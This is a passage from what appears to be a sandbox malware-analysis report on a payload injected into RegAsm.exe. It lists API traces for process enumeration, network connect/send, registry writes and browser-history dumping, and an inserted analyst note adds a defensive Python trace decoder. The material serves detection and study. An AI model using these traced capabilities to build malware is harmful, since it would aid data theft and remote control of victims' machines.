                                                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                • _free.LIBCMT ref: 00448353
                                                                                • _free.LIBCMT ref: 0044837A
                                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                • _free.LIBCMT ref: 10005BB4
                                                                                • _free.LIBCMT ref: 10005BDB
                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                • String ID:
                                                                                • API String ID: 2951400881-0
                                                                                • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
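Analyst note (added example, not part of the Joe Sandbox report): the two function records above that reference the Toolhelp routine at 0040F956..0040FB40 and its OpenProcess/GetProcessImageFileNameW helper at 0041C286..0041C2CC are the injected RegAsm payload's process-enumeration code. The report prints the argument column as raw hex, so the script below parses those API lines (copied verbatim from the page), decodes the numeric arguments against the Windows SDK constant names (TH32CS_* snapshot flags, PROCESS_* access rights, MAX_PATH) and emits a capability summary. Reading 0x22C as the PROCESSENTRY32W dwSize and 0x104 as the GetProcessImageFileNameW buffer length is an interpretation of the tracer's argument column, not something the report states; the parser, the constant tables and the summary wording are this note's own.

```python
"""Decode a Joe Sandbox function-level API trace into named Win32 constants.

Input lines are copied from the report's "APIs" sections for the process
enumeration routine (0040F956..0040FB40) and its OpenProcess helper
(0041C286..0041C2CC). Parser and tables are this note's own, not the report's.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# API trace lines exactly as the report prints them.
TRACE = """\
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
• Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
• CloseHandle.KERNEL32(00000000), ref: 0040FB40
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
"""

@dataclass
class Call:
    api: str
    module: str
    args: List[str]            # raw tokens; '?' means the tracer did not recover the value
    ref: int                   # call-site address
    subcall_of: Optional[int]  # parent function when flagged "Part of subcall function"

# Bullet, optional "Part of subcall function XXXXXXXX:", API.MODULE, optional "(args)", ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Constant names from the Windows SDK headers (tlhelp32.h, winnt.h).
TH32CS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD",
          0x8: "TH32CS_SNAPMODULE", 0x10: "TH32CS_SNAPMODULE32"}
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
                  0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
                  0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
                  0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}

def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls

def hexarg(call: Call, i: int) -> Optional[int]:
    """Argument i as an int, or None when the tracer shows '?' or a non-numeric token."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None

def decode_flags(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return " | ".join(names) or "0"

def decode_call(call: Call) -> str:
    """Render the call with its numeric arguments replaced by SDK names where known."""
    if call.api == "CreateToolhelp32Snapshot" and (v := hexarg(call, 0)) is not None:
        return f"{call.api}(dwFlags={decode_flags(v, TH32CS)})"
    if call.api == "OpenProcess" and (v := hexarg(call, 0)) is not None:
        return f"{call.api}(dwDesiredAccess={decode_flags(v, PROCESS_ACCESS)})"
    if call.api in ("Process32FirstW", "Process32NextW") and (v := hexarg(call, 1)) is not None:
        # 0x22C == 556 == sizeof(PROCESSENTRY32W) for a 32-bit caller (interpretation of the trace)
        note = " == sizeof(PROCESSENTRY32W) on 32-bit" if v == 0x22C else ""
        return f"{call.api}(lppe->dwSize=0x{v:X}{note})"
    if call.api == "GetProcessImageFileNameW" and (v := hexarg(call, 2)) is not None:
        note = " == MAX_PATH" if v == 0x104 else ""  # 0x104 == 260
        return f"{call.api}(nSize={v}{note})"
    return f"{call.api}()"

def capabilities(calls: List[Call]) -> List[str]:
    """Summarise what the traced routine can do, from the API combination alone."""
    apis = {c.api for c in calls}
    caps = []
    snaps = [c for c in calls if c.api == "CreateToolhelp32Snapshot"]
    if any((hexarg(c, 0) or 0) & 0x2 for c in snaps) and {"Process32FirstW", "Process32NextW"} & apis:
        caps.append("enumerates running processes (Toolhelp snapshot)")
    if "IsWow64Process" in apis:
        caps.append("checks WoW64 (32-bit on 64-bit) state of itself or other processes")
    if "OpenProcess" in apis and "GetProcessImageFileNameW" in apis:
        caps.append("opens other processes with query-only rights and resolves their image paths")
    return caps

if __name__ == "__main__":
    for c in parse_trace(TRACE):
        print(f"{c.ref:08X}  {decode_call(c)}")
    print(capabilities(parse_trace(TRACE)))
```

The decoded access masks are the useful part for triage: both OpenProcess calls ask only for PROCESS_QUERY_LIMITED_INFORMATION or PROCESS_QUERY_INFORMATION, so this routine is reconnaissance over the process list, not the injection primitive (that needs VM_WRITE/CREATE_THREAD rights and is covered by the report's separate "Injects a PE file into a foreign processes" signature).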
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcat
                                                                                • String ID:
                                                                                • API String ID: 493641738-0
                                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00450A54
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 00450A66
                                                                                • _free.LIBCMT ref: 00450A78
                                                                                • _free.LIBCMT ref: 00450A8A
                                                                                • _free.LIBCMT ref: 00450A9C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                APIs
                                                                                • _free.LIBCMT ref: 100091D0
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 100091E2
                                                                                • _free.LIBCMT ref: 100091F4
                                                                                • _free.LIBCMT ref: 10009206
                                                                                • _free.LIBCMT ref: 10009218
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00444106
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 00444118
                                                                                • _free.LIBCMT ref: 0044412B
                                                                                • _free.LIBCMT ref: 0044413C
                                                                                • _free.LIBCMT ref: 0044414D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                APIs
                                                                                • _free.LIBCMT ref: 1000536F
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 10005381
                                                                                • _free.LIBCMT ref: 10005394
                                                                                • _free.LIBCMT ref: 100053A5
                                                                                • _free.LIBCMT ref: 100053B6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                APIs
                                                                                • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                • _free.LIBCMT ref: 0044E8D5
                                                                                  • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                  • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                  • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                • String ID: *?$.
                                                                                • API String ID: 2812119850-3972193922
                                                                                • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                APIs
                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00C24830,00000010), ref: 004048E0
                                                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                • String ID: XQG$p54$NG
                                                                                • API String ID: 1634807452-455644847
                                                                                • Opcode ID: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                                                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                • Opcode Fuzzy Hash: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                                                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                • _free.LIBCMT ref: 004435E0
                                                                                • _free.LIBCMT ref: 004435EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                • API String ID: 2506810119-1068371695
                                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                • API String ID: 2506810119-1068371695
                                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                                • API String ID: 368326130-3219657780
                                                                                • Opcode ID: ce3dd2a3c922dbd16ff5d7b3e0c03d620dd493b22bab1a3ecf79b0a41218aa7b
                                                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                • Opcode Fuzzy Hash: ce3dd2a3c922dbd16ff5d7b3e0c03d620dd493b22bab1a3ecf79b0a41218aa7b
                                                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32 ref: 0041CB68
                                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                • API String ID: 4127273184-3576401099
                                                                                • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 00416330
                                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
